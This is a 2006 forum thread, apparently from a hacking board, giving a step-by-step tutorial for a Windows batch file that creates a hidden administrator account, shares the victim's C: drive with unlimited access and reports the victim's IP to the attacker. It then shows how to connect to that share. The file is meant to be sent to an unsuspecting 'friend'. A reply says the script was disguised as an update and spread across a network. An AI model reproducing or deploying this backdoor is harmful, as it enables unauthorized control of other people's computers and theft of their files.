zbeng Posted November 15, 2006 Report Posted November 15, 2006 -Bazics-Opening a dos prompt -> Go to start and then execute and writecmd and press okNow insert this command: netAnd you will get something like thisNET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]Ok in this tutorial we well use 3 of the commands listed herethey are: net user , net share and net sendWe will select some of those commands and put them on a .bat file.What is a .bat file?Bat file is a piece of text that windows will execute as commands.Open notepad and whrite there:dirpauseAnd now save this as test.bat and execute it.Funny aint it ?---------------------- Starting ------------------- -:Server:-The plan here is to share the C: drive and make a new userwith administrators accessStep one -> Open a dos prompt and a notebookThe dos prompt will help you to test if the commands are okand the notebook will be used to make the .bat file.Command n 1-> net user neo /addWhat does this do? It makes a new user called neo you can putany name you whantCommand n 2-> net localgroup administrators neo /addThis is the command that make your user go to the administratorsgroup.Depending on the windows version the name will be different.If you got an american version the name for the group is Administratorsand for the portuguese version is administradores so it's niceyo know wich version of windows xp you are going to try share.Command n 3->net share system=C: /unlimitedThis commands share the C: drive with the name of system.Nice and those are the 3 commands that you will need to put on your.bat file and send to your friend.-!extras!-Command n 4-> net send urip I am ur serverWhere it says urip you will insert your ip and when the victimopens the .bat it will send a message to your computerand you can check the victim ip.->To see your ip in the dos prompt put this command: ipconfig-----------------------: Client :----------------Now that your friend opened your .bat file her system have theC: drive shared and a new administrator user.First we need to make a session with the remote computer withthe net use command , you will execute these commands from yourdos prompt.Command n 1 -> net use \victimip neoThis command will make a session between you and the victimOf course where it says victimip you will insert the victim ip.Command n 2-> explorer \victimipsystemAnd this will open a explorer windows in the share system wich isthe C: drive with administrators access!SIMPLU SI FOLOSITOR;) Quote
escalation666 Posted November 15, 2006 Report Posted November 15, 2006 scriptul asta l-am pus la un in calc care avea file and printer sharing...cu denumirea de odc_update43 ceva de genu....si dupa un timp am vazut ca aparuse scriptul si pe odc...el s-o raspandit deja pe la mai multi din retea ) Quote